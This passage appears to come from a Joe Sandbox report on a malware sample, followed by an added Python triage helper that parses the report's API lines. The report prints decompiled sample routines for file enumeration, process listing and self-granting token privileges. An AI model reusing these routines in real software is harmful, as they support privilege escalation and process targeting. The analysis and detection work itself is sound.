                          0x00000000
                          0x00000000
                          0x005d5a63
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005d5a69
                          0x005d5a11
                          0x005d5a15
                          0x00000000
                          0x005d5a71
                          0x005d5a7a
                          0x005d5a7c
                          0x005d5a84
                          0x005d5a84
                          0x005d5a95
                          0x00000000
                          0x005d5a95
                          0x005d576f
                          0x005d5774
                          0x005d577b
                          0x005d5781
                          0x005d5784
                          0x005d5785
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005d5787
                          0x005d578c
                          0x005d578e
                          0x005d578e
                          0x005d5790
                          0x005d5790
                          0x005d579b
                          0x00000000
                          0x00000000
                          0x005d579d
                          0x005d57a1
                          0x005d57a1
                          0x005d57a6
                          0x00000000
                          0x00000000
                          0x005d57a8
                          0x00000000
                          0x005d57a8
                          0x005d57b3
                          0x005d57b9
                          0x005d57c0
                          0x005d57c5
                          0x005d57cb
                          0x005d57ce
                          0x005d57cf
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005d57d1
                          0x005d57d6
                          0x005d57d8
                          0x005d57d8
                          0x005d57da
                          0x005d57e1
                          0x00000000
                          0x00000000
                          0x005d57e3
                          0x005d57e7
                          0x005d57e7
                          0x005d57ec
                          0x00000000
                          0x00000000
                          0x005d57ee
                          0x00000000
                          0x005d57ee
                          0x005d57f9
                          0x00000000

                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 005D58D9
                          • Sleep.KERNEL32(00000064,?,?,?), ref: 005D5986
                          • lstrcmpiW.KERNEL32(?,005D9C3A), ref: 005D59DB
                          • FindNextFileW.KERNEL32(?,?), ref: 005D5A7A
                          • FindClose.KERNEL32 ref: 005D5A95
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Find$File$CloseFirstNextSleeplstrcmpi
                          • String ID:
                          • API String ID: 2811834920-0
                          • Opcode ID: 982d76bd4eeb01b9bc422654d17ca7a517567e0d7c5f6319a75140e2bf778491
                          • Instruction ID: 48d51debf3b949e529f22faa1650b22546443f5c10e53b20e3201946ce0f2137
                          • Opcode Fuzzy Hash: 982d76bd4eeb01b9bc422654d17ca7a517567e0d7c5f6319a75140e2bf778491
                          • Instruction Fuzzy Hash: 3591F331904B11DBD7309B68C894A7ABBE6FF90316F64892FE4468B3A1F7319C45D782
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E005CC440() {
                          				WCHAR* _v4;
                          				char _v1048;
                          				char _v1568;
                          				intOrPtr _v1596;
                          				void* _t14;
                          				struct tagPROCESSENTRY32W* _t16;
                          				signed int _t26;
                          				void* _t27;
                          				int _t31;
                          				WCHAR* _t32;
                          				struct tagPROCESSENTRY32W _t33;
                          				void* _t40;
                          
                          				_t14 = CreateToolhelp32Snapshot(2, 0);
                          				if(_t14 == 0xffffffff) {
                          					_t31 = 0;
                          					L9:
                          					return _t31;
                          				}
                          				_t27 = _t14;
                          				_t16 = _t33;
                          				 *_t16 = 0x22c;
                          				Process32FirstW(_t27, _t16);
                          				_t26 = 0;
                          				if(_t16 == 0) {
                          					L6:
                          					CloseHandle(_t27);
                          					_t31 = 0;
                          					if(_t26 > 0) {
                          						_t31 = E005C3180(4 + _t26 * 4, 0);
                          						E005CC400(_t31,  &_v1048, _t26 * 4);
                          						 *((intOrPtr*)(_t31 + _t26 * 4)) = 0;
                          					}
                          					goto L9;
                          				}
                          				_t26 = 0;
                          				_t32 =  &_v1568;
                          				do {
                          					if(lstrcmpW(_v4, _t32) != 0) {
                          						goto L5;
                          					}
                          					_t40 = _t26 - 0xfd;
                          					 *((intOrPtr*)(_t33 + 0x22c + _t26 * 4)) = _v1596;
                          					_t26 = _t26 + 1;
                          					if(_t40 > 0) {
                          						goto L6;
                          					}
                          					L5:
                          				} while (Process32NextW(_t27, _t33) != 0);
                          				goto L6;
                          			}

                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005CC44E
                          • Process32FirstW.KERNEL32(00000000), ref: 005CC469
                          • lstrcmpW.KERNEL32(?,?), ref: 005CC48C
                          • Process32NextW.KERNEL32(00000000), ref: 005CC4AC
                          • CloseHandle.KERNEL32(00000000), ref: 005CC4B7
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmp
                          • String ID:
                          • API String ID: 2964220450-0
                          • Opcode ID: 6a0da191e35a3eebc0de66f1e6e7e22f9ed7fea7ab45add4cddf1ef5eee4ef72
                          • Instruction ID: b8de8a0eca20497932fe4eda913ff19fe46bd471cbe39ff78ef104fd7afd3cde
                          • Opcode Fuzzy Hash: 6a0da191e35a3eebc0de66f1e6e7e22f9ed7fea7ab45add4cddf1ef5eee4ef72
                          • Instruction Fuzzy Hash: 981193716002046FD7206FB9ECC9FBB3FADEB85755F10812AE90CD6161EA259C1987A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E005C4DE0(signed int __ecx) {
                          				intOrPtr _t91;
                          				signed int _t98;
                          				signed int _t100;
                          				intOrPtr _t102;
                          				signed int _t105;
                          				signed int _t107;
                          				intOrPtr _t108;
                          				signed int _t109;
                          				signed int _t110;
                          				signed int _t111;
                          				signed int _t114;
                          				intOrPtr _t115;
                          				signed int _t118;
                          				signed int _t119;
                          				signed int _t122;
                          				signed int _t123;
                          				signed int _t125;
                          				signed int _t129;
                          				intOrPtr _t130;
                          				intOrPtr _t132;
                          				signed int _t133;
                          				signed int _t137;
                          				signed int _t138;
                          				signed int _t140;
                          				signed int _t144;
                          				signed int _t146;
                          				signed int _t147;
                          				signed int _t148;
                          				signed int _t149;
                          				signed int _t151;
                          				signed int _t153;
                          				signed int _t155;
                          				signed int _t158;
                          				signed int _t159;
                          				signed int _t160;
                          				signed int _t161;
                          				signed int _t162;
                          				signed int _t166;
                          				signed int _t167;
                          				signed int _t168;
                          				signed int _t169;
                          				signed int* _t172;
                          				signed int* _t174;
                          				signed int* _t175;
                          				signed int* _t176;
                          				signed int* _t177;
                          
                          				_t91 =  *0x5d9b0c; // 0x26f2b8
                          				_t153 = 0;
                          				_t167 = __ecx;
                          				_t172[1] = 0;
                          				_t172[3] = 0;
                          				_t172[5] = 0;
                          				 *(_t91 + 8) = 6;
                          				_t5 = _t91 + 0x24; // 0x0
                          				_t132 =  *_t5;
                          				if(_t132 == 0) {
                          					 *(_t91 + 8) = 2;
                          					_t129 = 0;
                          					goto L15;
                          				} else {
                          					_t98 = 0xfffffffe;
                          					_t155 = 1;
                          					while( *((short*)(_t132 + _t155 * 2 - 2)) != 0) {
                          						_t155 = _t155 + 1;
                          						_t98 = _t98 + 0xfffffffe;
                          						if(_t155 != 0x80000000) {
                          							continue;
                          						}
                          						_t129 = 0;
                          						_t166 = 0;
                          						_t153 = 0;
                          						L24:
                          						_t92 = _t172[1];
                          						if(_t172[1] != 0) {
                          							E005C91E0(_t92);
                          							_t172 =  &(_t172[1]);
                          						}
                          						if(_t153 != 0) {
                          							E005C91E0(_t166);
                          							_t172 =  &(_t172[1]);
                          						}
                          						_t93 = _t172[3];
                          						if(_t172[3] != 0) {
                          							E005C91E0(_t93);
                          						}
                          						return _t129;
                          					}
                          					_t129 = 0;
                          					_t100 = E005C3180( ~_t98, 0);
                          					_t172 =  &(_t172[2]);
                          					_t166 = _t100;
                          					__eflags = _t100;
                          					if(_t100 == 0) {
                          						_t153 = _t166;
                          						L15:
                          						_t166 = 0;
                          						goto L24;
                          					}
                          					__eflags = _t155;
                          					if(_t155 <= 0) {
                          						_t129 = 0;
                          						__eflags = _t155;
                          						if(_t155 != 0) {
                          							 *_t166 = 0;
                          						}
                          						L23:
                          						_t153 = _t166;
                          						goto L24;
                          					}
                          					_t10 = _t155 - 1; // 0x0
                          					_t133 = 0;
                          					_t144 = 2;
                          					_t172[6] = _t167;
                          					_t172[2] = _t10;
                          					_t102 =  *0x5d9b0c; // 0x26f2b8
                          					_t13 = _t102 + 0x24; // 0x0
                          					_t130 =  *_t13;
                          					_t172[4] = 1;
                          					_t105 = 0;
                          					__eflags = 0;
                          					while(1) {
                          						_t168 =  *(_t130 + _t105 * 2) & 0x0000ffff;
                          						__eflags = _t168;
                          						if(_t168 == 0) {
                          							break;
                          						}
                          						 *(_t166 + _t105 * 2) = _t168;
                          						_t144 = _t144 + 0xfffffffe;
                          						_t133 = _t133 + 0xfffffffe;
                          						__eflags = _t155 - 1;
                          						_t155 = _t155 - 1;
                          						if(__eflags == 0) {
                          							L12:
                          							__eflags = _t155;
                          							_t143 =  ==  ?  ~_t144 :  ~_t133;
                          							 *((short*)(_t166 + ( ==  ?  ~_t144 :  ~_t133))) = 0;
                          							if(_t155 != 0) {
                          								L19:
                          								_t169 = _t172[6];
                          								_t107 = E005D08A0( &(_t172[5]), _t166, _t172[4],  &(_t172[3]),  &(_t172[5]));
                          								__eflags = _t107;
                          								if(_t107 == 0) {
                          									L21:
                          									_t108 =  *0x5d9b0c; // 0x26f2b8
                          									 *(_t108 + 8) = 2;
                          									L22:
                          									_t129 = 0;
                          									__eflags = 0;
                          									goto L23;
                          								}
                          								_t109 = _t172[5];
                          								__eflags = _t109 - 1 - 0x1fffe;
                          								if(_t109 - 1 < 0x1fffe) {
                          									_t110 = E005CC380(_t172[6], 0,  &(_t172[1]), _t109);
                          									_t172 =  &(_t172[4]);
                          									_t129 = 0;
                          									__eflags = _t110;
                          									if(_t110 == 0) {
                          										goto L23;
                          									}
                          									_t156 =  &(_t172[0x49]);
                          									_t111 = GetSystemDirectoryW( &(_t172[0x49]), 0x104);
                          									__eflags = _t111;
                          									if(_t111 == 0) {
                          										goto L23;
                          									}
                          									 *((intOrPtr*)(_t172 + 0x124 + _t111 * 2)) = 0x5c;
                          									E005D4520(_t172 + 0x126 + _t111 * 2, 0x5c);
                          									_t174 =  &(_t172[2]);
                          									__eflags =  *0x5d9ae8;
                          									if( *0x5d9ae8 == 0) {
                          										L58:
                          										_t114 = E005D6E60(0, _t156, _t174[1]);
                          										_t172 =  &(_t174[3]);
                          										__eflags = _t114;
                          										_t172[4] = _t114;
                          										if(_t114 == 0) {
                          											goto L23;
                          										}
                          										L59:
                          										_t115 =  *0x5d9b0c; // 0x26f2b8
                          										 *((intOrPtr*)(_t115 + 8)) = 1;
                          										E005D4520( &(_t172[9]), 0x5e);
                          										_t175 =  &(_t172[2]);
                          										_push(_t175[1]);
                          										E005D4610(_t169, 0xe,  &(_t172[9]));
                          										_t172 =  &(_t175[4]);
                          										_t129 = _t172[4];
                          										goto L23;
                          									}
                          									_t158 = 0xfffffc00;
                          									_t118 = E005C3180(0x800, 0);
                          									_t176 =  &(_t174[2]);
                          									_t146 = _t118;
                          									while(1) {
                          										_t137 =  *(_t176 + 0x924 + _t158 * 2) & 0x0000ffff;
                          										_t119 = _t158;
                          										__eflags = _t137;
                          										if(_t137 == 0) {
                          											break;
                          										}
                          										 *(_t146 + 0x800 + _t119 * 2) = _t137;
                          										_t158 = _t119 + 1;
                          										__eflags = _t158;
                          										if(_t158 != 0) {
                          											continue;
                          										}
                          										 *(_t146 + 0x800 + _t119 * 2) = 0;
                          										L54:
                          										_t162 = 0;
                          										__eflags = 0;
                          										L55:
                          										__eflags = _t147;
                          										if(_t147 != 0) {
                          											E005C91E0(_t147);
                          											_t172 =  &(_t172[1]);
                          										}
                          										__eflags = _t162;
                          										_t156 =  &(_t172[0x49]);
                          										if(_t162 != 0) {
                          											goto L59;
                          										} else {
                          											goto L58;
                          										}
                          									}
                          									 *(_t146 + 0x800 + _t119 * 2) = 0;
                          									_t176[2] = _t146;
                          									E005D4520( &(_t176[9]), 0x5d);
                          									_t147 = _t176[2];
                          									_t177 =  &(_t176[2]);
                          									_t122 = 0x400;
                          									_t138 = _t147;
                          									while(1) {
                          										__eflags =  *_t138;
                          										if( *_t138 == 0) {
                          											break;
                          										}
                          										_t138 = _t138 + 2;
                          										_t122 = _t122 - 1;
                          										__eflags = _t122;
                          										if(_t122 != 0) {
                          											continue;
                          										}
                          										L46:
                          										_t123 = 0x400;
                          										_t177[2] = _t177[1];
                          										_t140 = _t147;
                          										while(1) {
                          											__eflags =  *_t140;
                          											if( *_t140 == 0) {
                          												break;
                          											}
                          											_t140 = _t140 + 2;
                          											_t123 = _t123 - 1;
                          											__eflags = _t123;
                          											if(_t123 != 0) {
                          												continue;
                          											}
                          											goto L54;
                          										}
                          										_t149 = 0;
                          										__eflags = 0;
                          										while(1) {
                          											_t161 = _t149;
                          											_t151 =  *(_t177[2] + _t161 * 2) & 0x0000ffff;
                          											__eflags = _t151;
                          											if(_t151 == 0) {
                          												break;
                          											}
                          											 *(_t140 + _t161 * 2) = _t151;
                          											_t73 = _t161 + 1; // 0x1
                          											_t149 = _t73;
                          											__eflags = _t123 - _t149;
                          											if(_t123 != _t149) {
                          												continue;
                          											}
                          											_t147 =  *_t177;
                          											 *(_t140 + _t161 * 2) = 0;
                          											goto L54;
                          										}
                          										 *(_t140 + _t161 * 2) = 0;
                          										_t162 = 0;
                          										_push(0);
                          										_push(0);
                          										_push(0x420);
                          										_push(_t177[3]);
                          										_push( &(_t177[7]));
                          										_t125 = E005C5470( &(_t177[8]));
                          										_t147 = _t177[6];
                          										_t172 =  &(_t177[6]);
                          										__eflags = _t125;
                          										if(_t125 != 0) {
                          											CloseHandle(_t172[8]);
                          											CloseHandle(_t172[7]);
                          											_t147 =  *_t172;
                          											_t162 = 1;
                          										}
                          										goto L55;
                          									}
                          									_t159 = 0;
                          									__eflags = 0;
                          									while(1) {
                          										_t148 = _t159;
                          										_t160 =  *(_t177 + 0x24 + _t159 * 2) & 0x0000ffff;
                          										__eflags = _t160;
                          										if(_t160 == 0) {
                          											break;
                          										}
                          										 *(_t138 + _t148 * 2) = _t160;
                          										_t63 = _t148 + 1; // 0x1
                          										_t159 = _t63;
                          										__eflags = _t122 - _t159;
                          										if(_t122 != _t159) {
                          											continue;
                          										}
                          										break;
                          									}
                          									 *(_t138 + _t148 * 2) = 0;
                          									_t147 =  *_t177;
                          									goto L46;
                          								}
                          								goto L21;
                          							}
                          							goto L22;
                          						}
                          						__eflags = _t105 - 0x7ffffffd;
                          						_t105 = _t105 + 1;
                          						if(__eflags != 0) {
                          							continue;
                          						}
                          						goto L12;
                          					}
                          					 *(_t166 + _t105 * 2) = 0;
                          					goto L19;
                          				}
                          			}

                          0x005c4dea
                          0x005c4def
                          0x005c4df1
                          0x005c4df3
                          0x005c4df7
                          0x005c4dfb
                          0x005c4dff
                          0x005c4e06
                          0x005c4e06
                          0x005c4e0b
                          0x005c4e34
                          0x005c4e3b
                          0x00000000
                          0x005c4e0d
                          0x005c4e0f
                          0x005c4e14
                          0x005c4e15
                          0x005c4e1d
                          0x005c4e1e
                          0x005c4e27
                          0x00000000
                          0x00000000
                          0x005c4e29
                          0x005c4e2b
                          0x005c4e2d
                          0x005c4f0b
                          0x005c4f0b
                          0x005c4f11
                          0x005c4f14
                          0x005c4f19
                          0x005c4f19
                          0x005c4f1e
                          0x005c4f21
                          0x005c4f26
                          0x005c4f26
                          0x005c4f29
                          0x005c4f2f
                          0x005c4f32
                          0x005c4f37
                          0x005c4f46
                          0x005c4f46
                          0x005c4e3f
                          0x005c4e45
                          0x005c4e4a
                          0x005c4e4d
                          0x005c4e4f
                          0x005c4e51
                          0x005c4eb4
                          0x005c4eb6
                          0x005c4eb6
                          0x00000000
                          0x005c4eb6
                          0x005c4e53
                          0x005c4e55
                          0x005c4eba
                          0x005c4ebc
                          0x005c4ebe
                          0x005c4ec0
                          0x005c4ec0
                          0x005c4f09
                          0x005c4f09
                          0x00000000
                          0x005c4f09
                          0x005c4e57
                          0x005c4e5a
                          0x005c4e5c
                          0x005c4e61
                          0x005c4e65
                          0x005c4e69
                          0x005c4e6e
                          0x005c4e6e
                          0x005c4e74
                          0x005c4e78
                          0x005c4e78
                          0x005c4e7a
                          0x005c4e7a
                          0x005c4e7e
                          0x005c4e81
                          0x00000000
                          0x00000000
                          0x005c4e83
                          0x005c4e87
                          0x005c4e8a
                          0x005c4e90
                          0x005c4e92
                          0x005c4e95
                          0x005c4ea1
                          0x005c4ea5
                          0x005c4ea7
                          0x005c4eaa
                          0x005c4eb0
                          0x005c4ecd
                          0x005c4ecd
                          0x005c4ee3
                          0x005c4ee8
                          0x005c4eea
                          0x005c4efb
                          0x005c4efb
                          0x005c4f00
                          0x005c4f07
                          0x005c4f07
                          0x005c4f07
                          0x00000000
                          0x005c4f07
                          0x005c4eec
                          0x005c4ef3
                          0x005c4ef9
                          0x005c4f53
                          0x005c4f58
                          0x005c4f5b
                          0x005c4f5d
                          0x005c4f5f
                          0x00000000
                          0x00000000
                          0x005c4f61
                          0x005c4f6e
                          0x005c4f74
                          0x005c4f76
                          0x00000000
                          0x00000000
                          0x005c4f78
                          0x005c4f8d
                          0x005c4f92
                          0x005c4f95
                          0x005c4f9c
                          0x005c5097
                          0x005c509e
                          0x005c50a3
                          0x005c50a6
                          0x005c50a8
                          0x005c50ac
                          0x00000000
                          0x00000000
                          0x005c50b2
                          0x005c50b2
                          0x005c50bb
                          0x005c50c5
                          0x005c50ca
                          0x005c50cd
                          0x005c50d5
                          0x005c50da
                          0x005c50dd
                          0x00000000
                          0x005c50dd
                          0x005c4fa2
                          0x005c4fae
                          0x005c4fb3
                          0x005c4fb6
                          0x005c4fb8
                          0x005c4fb8
                          0x005c4fc0
                          0x005c4fc2
                          0x005c4fc5
                          0x00000000
                          0x00000000
                          0x005c4fc9
                          0x005c4fd1
                          0x005c4fd1
                          0x005c4fd2
                          0x00000000
                          0x00000000
                          0x005c4fd4
                          0x005c507d
                          0x005c507d
                          0x005c507d
                          0x005c507f
                          0x005c507f
                          0x005c5081
                          0x005c5084
                          0x005c5089
                          0x005c5089
                          0x005c508c
                          0x005c508e
                          0x005c5095
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005c5095
                          0x005c4fe3
                          0x005c4ff4
                          0x005c4ff8
                          0x005c4ffd
                          0x005c5001
                          0x005c5004
                          0x005c5009
                          0x005c500b
                          0x005c500b
                          0x005c500f
                          0x00000000
                          0x00000000
                          0x005c5011
                          0x005c5014
                          0x005c5014
                          0x005c5015
                          0x00000000
                          0x00000000
                          0x005c503b
                          0x005c503f
                          0x005c5044
                          0x005c5048
                          0x005c504a
                          0x005c504a
                          0x005c504e
                          0x00000000
                          0x00000000
                          0x005c5050
                          0x005c5053
                          0x005c5053
                          0x005c5054
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005c5056
                          0x005c5058
                          0x005c5058
                          0x005c505a
                          0x005c505a
                          0x005c5060
                          0x005c5064
                          0x005c5067
                          0x00000000
                          0x00000000
                          0x005c5069
                          0x005c506d
                          0x005c506d
                          0x005c5070
                          0x005c5072
                          0x00000000
                          0x00000000
                          0x005c5074
                          0x005c5077
                          0x00000000
                          0x005c5077
                          0x005c50e6
                          0x005c50ec
                          0x005c50f6
                          0x005c50f7
                          0x005c50f8
                          0x005c50fd
                          0x005c5101
                          0x005c5103
                          0x005c5108
                          0x005c510c
                          0x005c510f
                          0x005c5111
                          0x005c5121
                          0x005c5127
                          0x005c5129
                          0x005c512e
                          0x005c512e
                          0x00000000
                          0x005c5111
                          0x005c5019
                          0x005c5019
                          0x005c501b
                          0x005c501b
                          0x005c501d
                          0x005c5022
                          0x005c5025
                          0x00000000
                          0x00000000
                          0x005c5027
                          0x005c502b
                          0x005c502b
                          0x005c502e
                          0x005c5030
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005c5030
                          0x005c5032
                          0x005c5038
                          0x00000000
                          0x005c5038
                          0x00000000
                          0x005c4ef9
                          0x00000000
                          0x005c4eb2
                          0x005c4e97
                          0x005c4e9c
                          0x005c4e9f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005c4e9f
                          0x005c4ec7
                          0x00000000
                          0x005c4ec7

                          APIs
                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C4F6E
                          • CloseHandle.KERNEL32(?), ref: 005C5121
                          • CloseHandle.KERNEL32(?), ref: 005C5127
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: CloseHandle$DirectorySystem
                          • String ID: \
                          • API String ID: 1693769833-2967466578
                          • Opcode ID: a7d5078d1cdbc424ef0c1282a8588eac37e739f4c308b7b02f390b9acc89e068
                          • Instruction ID: 1964b9d82681dd50e5cb54fcdc45aba26e632bee42f2987068b060d964196949
                          • Opcode Fuzzy Hash: a7d5078d1cdbc424ef0c1282a8588eac37e739f4c308b7b02f390b9acc89e068
                          • Instruction Fuzzy Hash: 1591D2716083029FD7209FA8D849F6BBBE5BFD0304F15892DE589972A1F771D845CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E005D2F10(void* __ecx) {
                          				char _v1036;
                          				struct _TOKEN_PRIVILEGES _v1052;
                          				struct _LUID _v1064;
                          				char _v1068;
                          				void* _v1072;
                          				void* _t10;
                          				intOrPtr _t12;
                          				void* _t14;
                          				struct _TOKEN_PRIVILEGES* _t23;
                          				char* _t25;
                          				HANDLE* _t27;
                          				WCHAR* _t28;
                          				long _t35;
                          				DWORD* _t36;
                          
                          				_t36 =  &_v1064;
                          				_t10 = E005CC430( *((intOrPtr*)(__ecx + 0x10)));
                          				_t35 = 0;
                          				if(_t10 == 0) {
                          					L9:
                          					return _t35;
                          				}
                          				_t12 =  *0x5d9ae8; // 0x0
                          				if(_t12 == 0) {
                          					goto L9;
                          				}
                          				if( *0x5d9c28 != 0) {
                          					L7:
                          					_t25 =  &_v1036;
                          					E005D4520(_t25, 0x9a);
                          					_push(_t25);
                          					_t14 = E005CC440();
                          					if(_t14 != 0) {
                          						_push(_t14);
                          						_t35 = E005CD350();
                          						E005C91E0(_t14);
                          					}
                          					goto L9;
                          				}
                          				_t27 =  &_v1072;
                          				 *_t27 = 0;
                          				 *_t36 = 0;
                          				if(OpenProcessToken(GetCurrentProcess(), 0x28, _t27) != 0) {
                          					_t28 =  &_v1036;
                          					E005D4520(_t28, 0x5f);
                          					_t36 =  &(_t36[2]);
                          					if(LookupPrivilegeValueW(0, _t28,  &_v1064) != 0) {
                          						_t23 =  &_v1068;
                          						_t23->PrivilegeCount = 1;
                          						_t23->Privileges[0].Luid = 2;
                          						AdjustTokenPrivileges(_v1072, 0, _t23, 0x10,  &_v1052, _t36);
                          					}
                          				}
                          				 *0x5d9c28 =  *0x5d9c28 + 1;
                          				goto L7;
                          			}

                          0x005d2f13
                          0x005d2f1e
                          0x005d2f23
                          0x005d2f27
                          0x005d2fe5
                          0x005d2ff0
                          0x005d2ff0
                          0x005d2f2d
                          0x005d2f34
                          0x00000000
                          0x00000000
                          0x005d2f41
                          0x005d2fb1
                          0x005d2fb1
                          0x005d2fbb
                          0x005d2fc3
                          0x005d2fc4
                          0x005d2fce
                          0x005d2fd4
                          0x005d2fda
                          0x005d2fdd
                          0x005d2fe2
                          0x00000000
                          0x005d2fce
                          0x005d2f45
                          0x005d2f49
                          0x005d2f4b
                          0x005d2f60
                          0x005d2f62
                          0x005d2f69
                          0x005d2f6e
                          0x005d2f81
                          0x005d2f83
                          0x005d2f8d
                          0x005d2f93
                          0x005d2fa5
                          0x005d2fa5
                          0x005d2f81
                          0x005d2fab
                          0x00000000

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 005D2F4E
                          • OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 005D2F58
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005D2F79
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?), ref: 005D2FA5
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                          • String ID:
                          • API String ID: 2349140579-0
                          • Opcode ID: 2ecade10cb3def7553b542d22f1309651034a02da64b0fe3a9a21ed7cdbf121c
                          • Instruction ID: 603f69c1ae1548c1f8fdbd1405ec59d53ba40c303549e2d1faf74815a0601e02
                          • Opcode Fuzzy Hash: 2ecade10cb3def7553b542d22f1309651034a02da64b0fe3a9a21ed7cdbf121c
                          • Instruction Fuzzy Hash: 3D2168B16013015FD7309B64EC8AF6B7BACEB94756F04482BF905C6292EA74D908C761
                          Uniqueness

                          Uniqueness Score: -1.00%
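
The four API references listed for E005D2F10 (GetCurrentProcess, OpenProcessToken with DesiredAccess 0x28, LookupPrivilegeValueW, AdjustTokenPrivileges with a 0x10-byte PreviousState buffer) are the standard enable-a-privilege-on-my-own-token sequence. The helper below is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in the report's "APIs" format, decodes the hex arguments into Win32 constant names, and flags that sequence when it appears in call order. The sample input is the four lines above plus one line constructed from the CreateFileW call in E005CA4D0 (no "ref:" address, because the report prints that call only in decompiled form). The line regex and the constant tables are mine; the constant values are the documented Win32 ones.

```python
"""Decode Joe Sandbox "APIs" lines and flag the token-privilege-enable pattern.
Added example for this report, not Joe Sandbox or sample code."""
import re
from typing import Dict, List, Optional

# Constructed sample input: the E005D2F10 API lines as printed in the report,
# plus one line built from the CreateFileW(_t254, 0xc0000000, 1, 0, 2, 0x80, 0)
# call in E005CA4D0 (the report gives no "ref:" address for it, so none here).
SAMPLE_API_LINES = [
    "• GetCurrentProcess.KERNEL32 ref: 005D2F4E",
    "• OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 005D2F58",
    "• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005D2F79",
    "• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?), ref: 005D2FA5",
    "• CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000)",
]

# "• Name.MODULE(hex,hex,?), ref: ADDR"; args and ref are both optional.
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)

# Win32 constants; dict insertion order is the order names are printed in.
TOKEN_ACCESS = {0x0001: "TOKEN_ASSIGN_PRIMARY", 0x0002: "TOKEN_DUPLICATE",
                0x0004: "TOKEN_IMPERSONATE", 0x0008: "TOKEN_QUERY",
                0x0010: "TOKEN_QUERY_SOURCE", 0x0020: "TOKEN_ADJUST_PRIVILEGES",
                0x0040: "TOKEN_ADJUST_GROUPS", 0x0080: "TOKEN_ADJUST_DEFAULT",
                0x0100: "TOKEN_ADJUST_SESSIONID"}
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTRS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02: "FILE_ATTRIBUTE_HIDDEN",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}


def parse_api_line(line: str) -> Optional[Dict]:
    """Parse one APIs line; '?' (pointer/string masked by the sandbox) becomes None."""
    m = API_LINE.match(line)
    if not m:
        return None
    args: List[Optional[int]] = []
    if m.group("args"):
        for a in m.group("args").split(","):
            a = a.strip()
            args.append(None if a == "?" else int(a, 16))
    return {"name": m.group("name"), "module": m.group("module"),
            "args": args, "ref": m.group("ref")}


def decode_flags(value: int, table: Dict[int, str]) -> str:
    """Render a bitmask as NAME|NAME, keeping any bits the table does not know."""
    names = [n for bit, n in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    if value & ~known:
        names.append(hex(value & ~known))
    return "|".join(names) if names else "0"


def describe_call(call: Dict) -> str:
    """Human-readable form of the calls that matter for this triage."""
    name, a = call["name"], call["args"]
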